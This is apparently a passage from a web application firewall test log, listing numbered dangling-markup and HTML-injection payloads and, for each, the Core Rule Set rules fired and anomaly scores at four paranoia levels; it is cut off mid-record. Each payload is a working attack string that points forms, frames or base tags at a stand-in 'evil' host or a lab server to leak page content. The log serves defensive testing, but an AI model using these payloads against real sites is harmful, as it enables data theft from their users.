941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 18
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 36
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 57
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 70
****** payload-203 ********
Payload:
payload=<isindex type=image src="//evil?</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 30
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 51
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 64
****** payload-204 ********
Payload:
payload=<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 23
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 41
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 62
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 75
****** payload-205 ********
Payload:
payload=<object data="//evil?</a>
--- Paranoia Level 1 ---
941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 30
--- Paranoia Level 3 ---
941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 48
--- Paranoia Level 4 ---
941300 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 61
****** payload-206 ********
Payload:
payload=<iframe src="//evil?</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 25
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 43
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 56
****** payload-207 ********
Payload:
payload=<embed src="//evil?</a>
--- Paranoia Level 1 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 35
--- Paranoia Level 3 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 53
--- Paranoia Level 4 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
932190 Remote Command Execution: Wildcard bypass technique attempt
Total Incoming Score: 66
****** payload-208 ********
Payload:
payload=<form><button formaction=//evil>XSS</button><textarea name=x></a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 41
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 54
****** payload-209 ********
Payload:
payload=<button form=x>XSS</button><form id=x action=//evil target='</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 18
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 34
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 47
****** payload-210 ********
Payload:
payload=<a href=http://subdomain1.portswigger-labs.net/dangling_markup/name.html><font size=100 color=red>You must click me</font></a><base target="</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 28
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 44
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
****** payload-211 ********
Payload:
payload=<form><input type=submit value="Click me" formaction=http://subdomain1.portswigger-labs.net/dangling_markup/name.html formtarget="</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 15
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 39
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941130 PL1 XSS Filter - Category 3: Attribute Vector
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 52
****** payload-212 ********
Payload:
payload=<a href=abc style="width:100%;height:100%;position:absolute;font-size:1000px;">xss<base href="//evil/</a>
--- Paranoia Level 1 ---
941280 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 18
--- Paranoia Level 2 ---
941280 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 41
--- Paranoia Level 3 ---
941280 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 57
--- Paranoia Level 4 ---
941280 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
920240 PL1 URL Encoding Abuse Attack Attempt
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 70
****** payload-213 ********
Payload:
payload=<embed src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="</a>
--- Paranoia Level 1 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
Total Incoming Score: 20
--- Paranoia Level 2 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 30
--- Paranoia Level 3 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 46
--- Paranoia Level 4 ---
941230 PL1 IE XSS Filters - Attack Detected.
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941140 PL1 XSS Filter - Category 4: Javascript URI Vector
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 59
****** payload-214 ********
Payload:
payload=<iframe src=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="</a>
--- Paranoia Level 1 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
Total Incoming Score: 10
--- Paranoia Level 2 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 20
--- Paranoia Level 3 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 36
--- Paranoia Level 4 ---
941160 PL1 NoScript XSS InjectionChecker: HTML Injection
941100 PL1 XSS Attack Detected via libinjection
941150 PL1 XSS Filter - Category 5: Disallowed HTML Attributes
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 49
****** payload-215 ********
Payload:
payload=<object data=http://subdomain1.portswigger-labs.net/dangling_markup/name.html name="</a>
--- Paranoia Level 1 ---
